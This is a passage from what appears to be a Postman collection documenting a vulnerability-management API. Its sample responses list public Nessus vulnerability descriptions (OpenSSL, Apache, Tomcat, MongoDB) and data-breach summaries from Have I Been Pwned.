missing outer     ContentInfo. This allows a remote attacker, using an     application that processes arbitrary PKCS#7 data and     providing malformed data with ASN.1 encoding, to cause     a denial of service. (CVE-2015-0289)\\n\\n  - A flaw exists in servers that both support SSLv2 and     enable export cipher suites due to improper     implementation of SSLv2. A remote attacker can exploit     this, via a crafted CLIENT-MASTER-KEY message, to cause     a denial of service. (CVE-2015-0293)\\n\\n  - A key disclosure vulnerability exists in the SSLv2     implementation in the get_client_master_key() function     due to the acceptance of a nonzero CLIENT-MASTER-KEY     CLEAR-KEY-LENGTH value for an arbitrary cipher. A     man-in-the-middle attacker can exploit this to determine     the MASTER-KEY value and decrypt TLS ciphertext data by     leveraging a Bleichenbacher RSA padding oracle.\\n    (CVE-2016-0703)    \\n  - An information disclosure vulnerability exists in the     SSLv2 implementation in the get_client_master_key()     function due to incorrectly overwriting MASTER-KEY bytes     during use of export cipher suites. A remote attacker     can exploit this to create a Bleichenbacher oracle.\\n    (CVE-2016-0704)\",\"severity\":2,\"categories\":[\"5b17d91de12f5e057c39ca9a\"],\"references\":[{\"url\":\"https://www.openssl.org/news/secadv/20160301.txt\",\"title\":\"www.openssl.org\"},{\"url\":\"https://www.openssl.org/news/secadv/20150319.txt\\n\",\"title\":\"www.openssl.org\"}],\"recommendation\":[\"5d024cf2c569d5025016dc5d\"],\"kb_id\":\"5d024cf2c569d5025016dc60\",\"root_cause\":\"5ab9178fe12f5e05704b906e\",\"data_sources\":[{\"ds_tool\":\"Nessus\",\"ds_key\":\"82030\"}]},{\"language\":\"en\",\"title\":\"Apache 2.2.x < 2.2.13 APR apr_palloc Heap Overflow\",\"description\":\"\\nAccording to its self-reported banner, the version of Apache 2.2.x running on the remote host is prior to 2.2.13. As such, it includes a bundled version of the Apache Portable Runtime (APR) library that contains a flaw in 'apr_palloc()' that could cause a heap overflow. \\n\\nNote that the Apache HTTP server itself does not pass unsanitized, user-provided sizes to this function so it could only be triggered through some other application that uses it in a vulnerable way.\",\"severity\":4,\"categories\":[\"5b17d91de12f5e057c39ca9a\"],\"cves\":[\"5cec2343c569d52c0f2e2df8\"],\"cwes\":[\"5cec2343c569d52c0f2e2df8\"],\"recommendation\":[\"5d024cf1c569d5025016dc5b\"],\"kb_id\":\"5d024cf1c569d5025016dc5c\",\"root_cause\":\"5ab9178fe12f5e05704b906e\",\"data_sources\":[{\"ds_tool\":\"Nessus\",\"ds_key\":\"57603\"}]},{\"language\":\"en\",\"title\":\"OpenSSL 0.9.8 < 0.9.8zd Multiple Vulnerabilities (FREAK)\",\"description\":\"\\nAccording to its banner, the remote web server uses a version of OpenSSL 0.9.8 prior to 0.9.8zd. The OpenSSL library is, therefore, affected by the following vulnerabilities :\\n\\n  - A NULL pointer dereference flaw exists when the SSLv3     option isn't enabled and an SSLv3 ClientHello is     received. This allows a remote attacker, using an     unexpected handshake, to crash the daemon, resulting in     a denial of service. (CVE-2014-3569)\\n\\n  - The BIGNUM squaring (BN_sqr) implementation does not     properly calculate the square of a BIGNUM value. This     allows remote attackers to defeat cryptographic     protection mechanisms. (CVE-2014-3570)\\n\\n  - A NULL pointer dereference flaw exists with     dtls1_get_record() when handling DTLS messages. A remote     attacker, using a specially crafted DTLS message, can     cause a denial of service. (CVE-2014-3571)\\n\\n  - A flaw exists with ECDH handshakes when using an ECDSA     certificate without a ServerKeyExchange message. This     allows a remote attacker to trigger a loss of forward     secrecy from the ciphersuite. (CVE-2014-3572)\\n\\n  - A flaw exists when accepting non-DER variations of     certificate signature algorithms and signature encodings     due to a lack of enforcement of matches between signed     and unsigned portions. A remote attacker, by including     crafted data within a certificate's unsigned portion,     can bypass fingerprint-based certificate-blacklist     protection mechanisms. (CVE-2014-8275)\\n\\n  - A security feature bypass vulnerability, known as FREAK     (Factoring attack on RSA-EXPORT Keys), exists due to the     support of weak EXPORT_RSA cipher suites with keys less     than or equal to 512 bits. A man-in-the-middle attacker     may be able to downgrade the SSL/TLS connection to use     EXPORT_RSA cipher suites which can be factored in a     short amount of time, allowing the attacker to intercept     and decrypt the traffic. (CVE-2015-0204)\",\"severity\":2,\"categories\":[\"5b17d91de12f5e057c39ca9a\"],\"references\":[{\"url\":\"https://www.openssl.org/news/secadv/20150108.txt\\n\",\"title\":\"www.openssl.org\"},{\"url\":\"https://www.openssl.org/news/vulnerabilities.html\\n\",\"title\":\"www.openssl.org\"},{\"url\":\"https://www.openssl.org/news/openssl-0.9.8-notes.html\\n\",\"title\":\"www.openssl.org\"}],\"recommendation\":[\"5d024cf1c569d5025016dc59\"],\"kb_id\":\"5d024cf1c569d5025016dc5a\",\"root_cause\":\"5ab9178fe12f5e05704b906e\",\"data_sources\":[{\"ds_tool\":\"Nessus\",\"ds_key\":\"80566\"}]},{\"language\":\"en\",\"title\":\"OpenSSL 0.9.8 < 0.9.8zc Multiple Vulnerabilities (POODLE)\",\"description\":\"\\nAccording to its banner, the remote web server uses a version of OpenSSL 0.9.8 prior to 0.9.8zc. The OpenSSL library is, therefore, affected by the following vulnerabilities :\\n\\n  - An error exists related to the way SSL 3.0 handles     padding bytes when decrypting messages encrypted using     block ciphers in cipher block chaining (CBC) mode. A     man-in-the-middle attacker can decrypt a selected byte     of a cipher text in as few as 256 tries if they are able     to force a victim application to repeatedly send the     same data over newly created SSL 3.0 connections. This     is also known as the 'POODLE' issue. (CVE-2014-3566)\\n\\n  - An error exists related to session ticket handling that     can allow denial of service attacks via memory leaks.\\n    (CVE-2014-3567)\\n\\n  - An error exists related to the build configuration     process and the 'no-ssl3' build option that allows     servers and clients to process insecure SSL 3.0     handshake messages. (CVE-2014-3568)\",\"severity\":2,\"categories\":[\"5b17d91de12f5e057c39ca9a\"],\"references\":[{\"url\":\"https://www.openssl.org/news/vulnerabilities.html\\n\",\"title\":\"www.openssl.org\"},{\"url\":\"https://www.imperialviolet.org/2014/10/14/poodle.html\\n\",\"title\":\"www.imperialviolet.org\"},{\"url\":\"https://tools.ietf.org/html/draft-ietf-tls-downgrade-scsv-00\",\"title\":\"tools.ietf.org\"},{\"url\":\"https://www.openssl.org/news/secadv/20141015.txt\\n\",\"title\":\"www.openssl.org\"},{\"url\":\"https://www.openssl.org/~bodo/ssl-poodle.pdf\\n\",\"title\":\"www.openssl.org\"},{\"url\":\"https://www.openssl.org/news/openssl-0.9.8-notes.html\\n\",\"title\":\"www.openssl.org\"}],\"recommendation\":[\"5d024cf1c569d5025016dc57\"],\"kb_id\":\"5d024cf1c569d5025016dc58\",\"root_cause\":\"5ab9178fe12f5e05704b906e\",\"data_sources\":[{\"ds_tool\":\"Nessus\",\"ds_key\":\"78552\"}]},{\"language\":\"en\",\"title\":\"OpenSSL < 0.9.8p / 1.0.0e Double Free Vulnerability\",\"description\":\"\\nAccording to its banner, the remote server is running a version of OpenSSL that is earlier than 0.9.8p / 1.0.0e. \\n\\nA remote attacker could crash client software when using ECDH.  The impact of this vulnerability is not clear; arbitrary code could be run too. \\n\\nNote that OpenSSL changelog only reports a fix for 0.9.8p.  1.0.0a is definitely vulnerable.  Gentoo reports a fix for 1.0.0e but it covers other flaws.NVD reports 0.9.7 as vulnerable too but does not give any fixed version.\",\"severity\":2,\"categories\":[\"5b17d91de12f5e057c39ca9a\"],\"references\":[{\"url\":\"http://www.mail-archive.com/openssl-dev@openssl.org/msg28049.html\",\"title\":\"www.mail-archive.com\"}],\"recommendation\":[\"5d024cf1c569d5025016dc54\"],\"kb_id\":\"5d024cf1c569d5025016dc56\",\"root_cause\":\"5ab9178fe12f5e05704b906e\",\"data_sources\":[{\"ds_tool\":\"Nessus\",\"ds_key\":\"17767\"}]},{\"language\":\"en\",\"title\":\"POP3 Service STLS Command Support\",\"description\":\"\\n\\nThe remote POP3 service supports the use of the 'STLS' command to switch from a cleartext to an encrypted communications channel.\",\"severity\":0,\"categories\":[\"5b17d91de12f5e057c39caba\"],\"references\":[{\"url\":\"https://en.wikipedia.org/wiki/STARTTLS\\n\",\"title\":\"en.wikipedia.org\"},{\"url\":\"https://tools.ietf.org/html/rfc2595\",\"title\":\"tools.ietf.org\"}],\"kb_id\":\"5d024cf1c569d5025016dc53\",\"root_cause\":\"5ab9178fe12f5e05704b906e\",\"data_sources\":[{\"ds_tool\":\"Nessus\",\"ds_key\":\"42087\"}]},{\"language\":\"en\",\"title\":\"POP3 Cleartext Logins Permitted\",\"description\":\"\\nThe remote host is running a POP3 daemon that allows cleartext logins over unencrypted connections. An attacker can uncover user names and passwords by sniffing traffic to the POP3 daemon if a less secure authentication mechanism (eg, USER command, AUTH PLAIN, AUTH LOGIN) is used.\",\"severity\":1,\"categories\":[\"5b17d91de12f5e057c39caba\"],\"references\":[{\"url\":\"https://tools.ietf.org/html/rfc2222\\n\",\"title\":\"tools.ietf.org\"},{\"url\":\"https://tools.ietf.org/html/rfc2595\",\"title\":\"tools.ietf.org\"}],\"recommendation\":[\"5d024cf1c569d5025016dc51\"],\"kb_id\":\"5d024cf1c569d5025016dc52\",\"root_cause\":\"5ab9178fe12f5e05704b906e\",\"data_sources\":[{\"ds_tool\":\"Nessus\",\"ds_key\":\"15855\"}]},{\"language\":\"en\",\"title\":\"OpenSSL 0.9.8 < 0.9.8za Multiple Vulnerabilities\",\"description\":\"\\nAccording to its banner, the remote web server uses a version of OpenSSL 0.9.8 prior to 0.9.8za. The OpenSSL library is, therefore, reportedly affected by the following vulnerabilities :\\n\\n  - An error exists related to the implementation of the     Elliptic Curve Digital Signature Algorithm (ECDSA) that     could allow nonce disclosure via the 'FLUSH+RELOAD'     cache side-channel attack. (CVE-2014-0076)\\n\\n  - A buffer overflow error exists related to invalid DTLS     fragment handling that could lead to execution of     arbitrary code. Note this issue only affects OpenSSL     when used as a DTLS client or server. (CVE-2014-0195)\\n\\n  - An error exists related to DTLS handshake handling that     could lead to denial of service attacks. Note this     issue only affects OpenSSL when used as a DTLS client.\\n    (CVE-2014-0221)\\n\\n  - An unspecified error exists that could allow an     attacker to cause usage of weak keying material     leading to simplified man-in-the-middle attacks.\\n    (CVE-2014-0224)\\n\\n  - An unspecified error exists related to anonymous ECDH     ciphersuites that could allow denial of service     attacks. Note this issue only affects OpenSSL TLS     clients. (CVE-2014-3470)\",\"severity\":3,\"categories\":[\"5b17d91de12f5e057c39ca9a\"],\"references\":[{\"url\":\"https://www.openssl.org/news/secadv/20140605.txt\\n\",\"title\":\"www.openssl.org\"},{\"url\":\"http://ccsinjection.lepidum.co.jp/\\n\",\"title\":\"ccsinjection.lepidum.co.jp\"},{\"url\":\"https://www.imperialviolet.org/2014/06/05/earlyccs.html\",\"title\":\"www.imperialviolet.org\"}],\"recommendation\":[\"5d024cf1c569d5025016dc4f\"],\"kb_id\":\"5d024cf1c569d5025016dc50\",\"root_cause\":\"5ab9178fe12f5e05704b906e\",\"data_sources\":[{\"ds_tool\":\"Nessus\",\"ds_key\":\"74363\"}]},{\"language\":\"en\",\"title\":\"Microsoft Outlook Web Access (OWA) Version Detection\",\"description\":\"\\nMicrosoft Exchange Server with Outlook Web Access (OWA) embeds the Exchange version number inside the default HTML web page. By requesting the default HTML page, Nessus was able to extract the Microsoft Exchange server version.\",\"severity\":0,\"categories\":[\"5b17e930e12f5e057c39fa67\"],\"kb_id\":\"5d024cf1c569d5025016dc4e\",\"root_cause\":\"5ab9178fe12f5e05704b906e\",\"data_sources\":[{\"ds_tool\":\"Nessus\",\"ds_key\":\"14255\"}]},{\"language\":\"en\",\"title\":\"IPSEC Internet Key Exchange (IKE) Version 1 Detection\",\"description\":\"\\n\\nThe remote host seems to be enabled to do Internet Key Exchange (IKE) version 1. This is typically indicative of a VPN server. VPN servers are used to connect remote hosts into internal resources. \\n\\nMake sure that the use of this VPN endpoint is done in accordance with your corporate security policy. \\n\\nNote that if the remote host is not configured to allow the Nessus host to perform IKE/IPSEC negotiations, Nessus won't be able to detect the IKE service. \\n\\nAlso note that this plugin does not run over IPv6.\",\"severity\":0,\"categories\":[\"5b17d91de12f5e057c39cac7\"],\"recommendation\":[\"5d024cf1c569d5025016dc4c\"],\"kb_id\":\"5d024cf1c569d5025016dc4d\",\"root_cause\":\"5ab9178fe12f5e05704b906e\",\"data_sources\":[{\"ds_tool\":\"Nessus\",\"ds_key\":\"11935\"}]},{\"language\":\"en\",\"title\":\"POP Server Detection\",\"description\":\"\\n\\nThe remote host is running a server that understands the Post Office Protocol (POP), used by email clients to retrieve messages from a server, possibly across a network link.\",\"severity\":0,\"categories\":[\"5b17d91de12f5e057c39cac7\"],\"references\":[{\"url\":\"https://en.wikipedia.org/wiki/Post_Office_Protocol\",\"title\":\"en.wikipedia.org\"}],\"recommendation\":[\"5d024cf1c569d5025016dc4a\"],\"kb_id\":\"5d024cf1c569d5025016dc4b\",\"root_cause\":\"5ab9178fe12f5e05704b906e\",\"data_sources\":[{\"ds_tool\":\"Nessus\",\"ds_key\":\"10185\"}]},{\"language\":\"en\",\"title\":\"SSL 64-bit Block Size Cipher Suites Supported (SWEET32)\",\"description\":\"\\nThe remote host supports the use of a block cipher with 64-bit blocks in one or more cipher suites. It is, therefore, affected by a vulnerability, known as SWEET32, due to the use of weak 64-bit block ciphers. A man-in-the-middle attacker who has sufficient resources can exploit this vulnerability, via a 'birthday' attack, to detect a collision that leaks the XOR between the fixed secret and a known plaintext, allowing the disclosure of the secret text, such as secure HTTPS cookies, and possibly resulting in the hijacking of an authenticated session.\\n\\nProof-of-concepts have shown that attackers can recover authentication cookies from an HTTPS session in as little as 30 hours.\\n\\nNote that the ability to send a large number of requests over the same TLS connection between the client and server is an important requirement for carrying out this attack. If the number of requests allowed for a single connection were limited, this would mitigate the vulnerability. However, Nessus has not checked for such a mitigation.\",\"severity\":2,\"categories\":[\"5b48a6fee12f5edae60cf6e6\"],\"references\":[{\"url\":\"https://sweet32.info\\n\",\"title\":\"sweet32.info\"},{\"url\":\"https://www.openssl.org/blog/blog/2016/08/24/sweet32/\",\"title\":\"www.openssl.org\"}],\"recommendation\":[\"5d024cf1c569d5025016dc47\"],\"kb_id\":\"5d024cf1c569d5025016dc49\",\"root_cause\":\"5ab9178fe12f5e05704b906e\",\"data_sources\":[{\"ds_tool\":\"Nessus\",\"ds_key\":\"94437\"}]},{\"language\":\"en\",\"title\":\"OpenSSL 0.9.8 < 0.9.8zg Multiple Vulnerabilities\",\"description\":\"\\nAccording to its banner, the remote web server uses a version of OpenSSL 0.9.8 prior to 0.9.8zg. The OpenSSL library is, therefore, affected by the following vulnerabilities :\\n\\n  - A denial of service vulnerability exists when processing     an ECParameters structure due to an infinite loop that     occurs when a specified curve is over a malformed binary     polynomial field. A remote attacker can exploit this to     perform a denial of service against any system that     processes public keys, certificate requests, or     certificates. This includes TLS clients and TLS servers     with client authentication enabled. (CVE-2015-1788)\\n\\n  - A denial of service vulnerability exists due to improper     validation of the content and length of the     ASN1_TIME string by the X509_cmp_time() function. A     remote attacker can exploit this, via a malformed     certificate and CRLs of various sizes, to cause a     segmentation fault, resulting in a denial of service     condition. TLS clients that verify CRLs are affected.\\n    TLS clients and servers with client authentication     enabled may be affected if they use custom verification     callbacks. (CVE-2015-1789)\\n\\n  - A NULL pointer dereference flaw exists in the PKCS#7     parsing code due to incorrect handling of missing inner     'EncryptedContent'. This allows a remote attacker, via     specially crafted ASN.1-encoded PKCS#7 blobs with     missing content, to cause a denial of service condition     or other potential unspecified impacts. (CVE-2015-1790)\\n\\n  - A double-free error exists due to a race condition that     occurs when a NewSessionTicket is received by a     multi-threaded client when attempting to reuse a     previous ticket. (CVE-2015-1791)\\n\\n  - A denial of service vulnerability exists in the CMS code     due to an infinite loop that occurs when verifying a     signedData message. A remote attacker can exploit this     to cause a denial of service condition. (CVE-2015-1792)\",\"severity\":2,\"categories\":[\"5b17d91de12f5e057c39ca9a\"],\"references\":[{\"url\":\"https://www.openssl.org/news/secadv/20150611.txt\",\"title\":\"www.openssl.org\"}],\"recommendation\":[\"5d024cf1c569d5025016dc45\"],\"kb_id\":\"5d024cf1c569d5025016dc46\",\"root_cause\":\"5ab9178fe12f5e05704b906e\",\"data_sources\":[{\"ds_tool\":\"Nessus\",\"ds_key\":\"84151\"}]},{\"language\":\"en\",\"title\":\"Apache 2.2.x < 2.2.15 Multiple Vulnerabilities\",\"description\":\"\\nAccording to its banner, the version of Apache 2.2.x running on the remote host is prior to 2.2.15. It is, therefore, potentially affected by multiple vulnerabilities :\\n\\n  - A TLS renegotiation prefix injection attack is possible.     (CVE-2009-3555)\\n\\n  - The 'mod_proxy_ajp' module returns the wrong status code     if it encounters an error which causes the back-end     server to be put into an error state. (CVE-2010-0408)\\n\\n  - The 'mod_isapi' attempts to unload the 'ISAPI.dll' when     it encounters various error states which could leave     call-backs in an undefined state. (CVE-2010-0425)\\n\\n  - A flaw in the core sub-request process code can lead to     sensitive information from a request being handled by     the wrong thread if a multi-threaded environment is     used. (CVE-2010-0434)\\n\\n  - Added 'mod_reqtimeout' module to mitigate Slowloris     attacks. (CVE-2007-6750)\",\"severity\":4,\"categories\":[\"5b17d91de12f5e057c39ca9a\"],\"cves\":[\"5cec2343c569d52c0f2e2e08\",\"5c802682c569d5745fa204eb\"],\"cwes\":[\"5cec2343c569d52c0f2e2e08\",\"5c802682c569d5745fa204eb\"],\"references\":[{\"url\":\"https://archive.apache.org/dist/\",\"title\":\"archive.apache.org\"},{\"url\":\"https://issues.apache.org/bugzilla/show_bug.cgi?id=48359\\n\",\"title\":\"issues.apache.org\"}],\"recommendation\":[\"5d024cf1c569d5025016dc41\"],\"kb_id\":\"5d024cf1c569d5025016dc44\",\"root_cause\":\"5ab9178fe12f5e05704b906e\",\"data_sources\":[{\"ds_tool\":\"Nessus\",\"ds_key\":\"45004\"}]},{\"language\":\"en\",\"title\":\"TLS Padding Oracle Information Disclosure Vulnerability (TLS POODLE)\",\"description\":\"\\nThe remote host is affected by a man-in-the-middle (MitM) information disclosure vulnerability known as POODLE. The vulnerability is due to the TLS server not verifying block cipher padding when using a cipher suite that employs a block cipher such as AES and DES. The lack of padding checking can allow encrypted TLS traffic to be decrypted. This vulnerability could allow for the decryption of HTTPS traffic by an unauthorized third party.\",\"severity\":2,\"categories\":[\"5b48a6fee12f5edae60cf6e6\"],\"references\":[{\"url\":\"http://www.nessus.org/u?3bcd20bf\",\"title\":\"www.nessus.org\"},{\"url\":\"https://www.imperialviolet.org/2014/12/08/poodleagain.html\\n\",\"title\":\"www.imperialviolet.org\"}],\"recommendation\":[\"5d024cf1c569d5025016dc3e\"],\"kb_id\":\"5d024cf1c569d5025016dc40\",\"root_cause\":\"5ab9178fe12f5e05704b906e\",\"data_sources\":[{\"ds_tool\":\"Nessus\",\"ds_key\":\"80035\"}]},{\"language\":\"en\",\"title\":\"Check Point FireWall-1 ICA Service Detection\",\"description\":\"\\nThe remote host is running Check Point FireWall-1 and is operating a web server on this port for its internal certificate authority (ICA), which provides users with certificate revocation lists and registers users when using the Policy Server. \\n\\nNote that it is not known whether it is possible to disable this service or limit its access to only certain interfaces or addresses.\",\"severity\":0,\"categories\":[\"5be9d941e12f5edae610e286\"],\"kb_id\":\"5d024cf1c569d5025016dc3d\",\"root_cause\":\"5ab9178fe12f5e05704b906e\",\"data_sources\":[{\"ds_tool\":\"Nessus\",\"ds_key\":\"22094\"}]},{\"language\":\"en\",\"title\":\"Exploit.In\",\"description\":\"In late 2016, a huge list of email address and password pairs appeared in a &quot;combo list&quot; referred to as &quot;Exploit.In&quot;. The list contained 593 million unique email addresses, many with multiple different passwords hacked from various online systems. The list was broadly circulated and used for &quot;credential stuffing&quot;, that is attackers employ it in an attempt to identify other online systems where the account owner had reused their password. For detailed background on this incident, read <a href=\\\"https://www.troyhunt.com/password-reuse-credential-stuffing-and-another-1-billion-records-in-have-i-been-pwned\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\">Password reuse, credential stuffing and another billion records in Have I been pwned</a>.\",\"severity\":3,\"categories\":[\"5ce7cec1c569d52c0f2d5721\",\"5ce7cec4c569d52c0f2d5739\"],\"kb_id\":\"5d01a446c569d5025016d692\",\"root_cause\":\"5ce7cec1c569d52c0f2d5729\",\"data_sources\":[{\"ds_tool\":\"Have I Been Pwned\",\"ds_key\":\"ExploitIn\"}]},{\"language\":\"en\",\"title\":\"Collection #1\",\"description\":\"In January 2019, a large collection of credential stuffing lists (combinations of email addresses and passwords used to hijack accounts on other services) was discovered being distributed on a popular hacking forum. The data contained almost 2.7 <em>billion</em> records including 773 million unique email addresses alongside passwords those addresses had used on other breached services. Full details on the incident and how to search the breached passwords are provided in the blog post <a href=\\\"https://www.troyhunt.com/the-773-million-record-collection-1-data-reach\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\">The 773 Million Record \\\"Collection #1\\\" Data Breach</a>.\",\"severity\":3,\"categories\":[\"5ce7cec1c569d52c0f2d5721\",\"5ce7cec4c569d52c0f2d5739\"],\"kb_id\":\"5d01a446c569d5025016d68e\",\"root_cause\":\"5ce7cec1c569d52c0f2d5729\",\"data_sources\":[{\"ds_tool\":\"Have I Been Pwned\",\"ds_key\":\"Collection1\"}]},{\"language\":\"en\",\"title\":\"Anti Public Combo List\",\"description\":\"In December 2016, a huge list of email address and password pairs appeared in a &quot;combo list&quot; referred to as &quot;Anti Public&quot;. The list contained 458 million unique email addresses, many with multiple different passwords hacked from various online systems. The list was broadly circulated and used for &quot;credential stuffing&quot;, that is attackers employ it in an attempt to identify other online systems where the account owner had reused their password. For detailed background on this incident, read <a href=\\\"https://www.troyhunt.com/password-reuse-credential-stuffing-and-another-1-billion-records-in-have-i-been-pwned\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\">Password reuse, credential stuffing and another billion records in Have I been pwned</a>.\",\"severity\":3,\"categories\":[\"5ce7cec1c569d52c0f2d5721\",\"5ce7cec4c569d52c0f2d5739\"],\"kb_id\":\"5d01a446c569d5025016d68a\",\"root_cause\":\"5ce7cec1c569d52c0f2d5729\",\"data_sources\":[{\"ds_tool\":\"Have I Been Pwned\",\"ds_key\":\"AntiPublic\"}]},{\"language\":\"en\",\"title\":\"2,844 Separate Data Breaches\",\"description\":\"In February 2018, <a href=\\\"https://www.troyhunt.com/ive-just-added-2844-new-data-breaches-with-80m-records-to-have-i-been-pwned/\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\">a massive collection of almost 3,000 alleged data breaches was found online</a>. Whilst some of the data had previously been seen in Have I Been Pwned, 2,844 of the files consisting of more than 80 million unique email addresses had not previously been seen. Each file contained both an email address and plain text password and were consequently loaded as a single &quot;unverified&quot; data breach.\",\"severity\":3,\"categories\":[\"5ce7cec1c569d52c0f2d5721\",\"5ce7cec4c569d52c0f2d5739\"],\"kb_id\":\"5d01a446c569d5025016d685\",\"root_cause\":\"5ce7cec1c569d52c0f2d5729\",\"data_sources\":[{\"ds_tool\":\"Have I Been Pwned\",\"ds_key\":\"2844Breaches\"}]},{\"language\":\"en\",\"title\":\"CentOS 6 : tomcat6 (CESA-2016:2045) (httpoxy)\",\"description\":\"\\nAn update for tomcat6 is now available for Red Hat Enterprise Linux 6.\\n\\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\\n\\nApache Tomcat is a servlet container for the Java Servlet and JavaServer Pages (JSP) technologies.\\n\\nSecurity Fix(es) :\\n\\n* It was discovered that the Tomcat packages installed certain configuration files read by the Tomcat initialization script as writeable to the tomcat group. A member of the group or a malicious web application deployed on Tomcat could use this flaw to escalate their privileges. (CVE-2016-6325)\\n\\n* It was found that several Tomcat session persistence mechanisms could allow a remote, authenticated user to bypass intended SecurityManager restrictions and execute arbitrary code in a privileged context via a web application that placed a crafted object in a session. (CVE-2016-0714)\\n\\n* It was discovered that tomcat used the value of the Proxy header from HTTP requests to initialize the HTTP_PROXY environment variable for CGI scripts, which in turn was incorrectly used by certain HTTP client implementations to configure the proxy for outgoing HTTP requests. A remote attacker could possibly use this flaw to redirect HTTP requests performed by a CGI script to an attacker-controlled proxy via a malicious HTTP request. (CVE-2016-5388)\\n\\n* A directory traversal flaw was found in Tomcat's RequestUtil.java. A remote, authenticated user could use this flaw to bypass intended SecurityManager restrictions and list a parent directory via a '/..' in a pathname used by a web application in a getResource, getResourceAsStream, or getResourcePaths call, as demonstrated by the $CATALINA_BASE/webapps directory. (CVE-2015-5174)\\n\\n* It was found that Tomcat could reveal the presence of a directory even when that directory was protected by a security constraint. A user could make a request to a directory via a URL not ending with a slash and, depending on whether Tomcat redirected that request, could confirm whether that directory existed. (CVE-2015-5345)\\n\\n* It was found that Tomcat allowed the StatusManagerServlet to be loaded by a web application when a security manager was configured.\\nThis allowed a web application to list all deployed web applications and expose sensitive information such as session IDs. (CVE-2016-0706)\\n\\nRed Hat would like to thank Scott Geary (VendHQ) for reporting CVE-2016-5388. The CVE-2016-6325 issue was discovered by Red Hat Product Security.\\n\\nBug Fix(es) :\\n\\n* Due to a bug in the tomcat6 spec file, the catalina.out file's md5sum, size, and mtime attributes were compared to the file's attributes at installation time. Because these attributes change after the service is started, the 'rpm -V' command previously failed. With this update, the attributes mentioned above are ignored in the RPM verification and the catalina.out file now passes the verification check. (BZ#1357123)\",\"severity\":3,\"categories\":[\"5cec232ec569d52c0f2e256f\"],\"references\":[{\"url\":\"http://www.nessus.org/u?f51bb064\",\"title\":\"www.nessus.org\"}],\"recommendation\":[\"5cec23efc569d52c0f2e6246\"],\"kb_id\":\"5cec23efc569d52c0f2e6249\",\"root_cause\":\"5ab9178fe12f5e05704b906e\",\"data_sources\":[{\"ds_tool\":\"Nessus\",\"ds_key\":\"93965\"}]},{\"language\":\"en\",\"title\":\"Oracle Java SE Multiple Vulnerabilities (July 2014 CPU) (Unix)\",\"description\":\"\\nThe version of Oracle (formerly Sun) Java SE or Java for Business installed on the remote host is prior to 8 Update 11, 7 Update 65, 6 Update 81, or 5 Update 71. It is, therefore, affected by security issues in the following components :\\n\\n  - Deployment\\n  - Hotspot\\n  - JavaFX\\n  - JMX\\n  - Libraries\\n  - Security\\n  - Serviceability\\n  - Swing\",\"severity\":4,\"categories\":[\"5b17d91de12f5e057c39caba\"],\"references\":[{\"url\":\"http://www.nessus.org/u?726f7054\\n\",\"title\":\"www.nessus.org\"},{\"url\":\"http://www.nessus.org/u?84f3023c\",\"title\":\"www.nessus.org\"},{\"url\":\"http://www.nessus.org/u?4743a1ef\\n\",\"title\":\"www.nessus.org\"},{\"url\":\"http://www.nessus.org/u?81911044\\n\",\"title\":\"www.nessus.org\"},{\"url\":\"http://www.nessus.org/u?39cb260f\\n\",\"title\":\"www.nessus.org\"}],\"recommendation\":[\"5cec23efc569d52c0f2e623d\"],\"kb_id\":\"5cec23efc569d52c0f2e6245\",\"root_cause\":\"5ab9178fe12f5e05704b906e\",\"data_sources\":[{\"ds_tool\":\"Nessus\",\"ds_key\":\"76533\"}]},{\"language\":\"en\",\"title\":\"MongoDB Service Without Authentication Detection\",\"description\":\"\\nMongoDB, a document-oriented database system, is listening on the remote port, and it is configured to allow connections without any authentication. A remote attacker can therefore connect to the database system in order to create, read, update, and delete documents, collections, and databases.\",\"severity\":2,\"categories\":[\"5b226ec5e12f5e057c3a2bcf\"],\"references\":[{\"url\":\"https://www.mongodb.com/\",\"title\":\"www.mongodb.com\"}],\"recommendation\":[\"5cec23eec569d52c0f2e623b\"],\"kb_id\":\"5cec23eec569d52c0f2e623c\",\"root_cause\":\"5ab9178fe12f5e05704b906e\",\"data_sources\":[{\"ds_tool\":\"Nessus\",\"ds_key\":\"81777\"}]}],\"pageable\":{\"sort\":{\"sorted\":true,\"unsorted\":false},\"pageSize\":30,\"pageNumber\":0,\"offset\":0,\"paged\":true,\"unpaged\":false},\"totalPages\":67,\"totalElements\":2006,\"last\":false,\"first\":true,\"sort\":{\"sorted\":true,\"unsorted\":false},\"numberOfElements\":30,\"size\":30,\"number\":0}"}],"_postman_id":"a8477c2c-635e-40de-bf6a-6f748d6f6180"},{"name":"KB Vulnerability by ID","id":"4237162e-903b-4a21-9255-4cb56241a494","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463","description":"<p>Your API Key.</p>\n"}],"url":"https://<instance>/api/v1/knowledge-base/vulnerabilities/<kb-vulnerability_id>","description":"<p>This endpoint allows you to retrieve a single KB Vulnerability, specifying its ID. If there is no active KB Vulnerability with the specified ID, the server will respond with a 204: No Content.</p>\n","urlObject":{"protocol":"https","path":["api","v1","knowledge-base","vulnerabilities","<kb-vulnerability_id>"],"host":["<instance>"],"query":[],"variable":[]}},"response":[{"id":"1fc28c60-9c46-4517-9ed1-9f6689650fdf","name":"Get a KB Vulnerability","originalRequest":{"method":"GET","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463","description":"Your API Key."}],"url":"https://instance/api/v1/knowledge-base/vulnerabilities/5d024cf2c569d5025016dc75"},"status":"Server Error","code":500,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Type","value":"application/json;charset=utf-8","name":"Content-Type","description":"The mime type of this content"},{"key":"Date","value":"Wed, 19 Jun 2019 14:32:30 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the 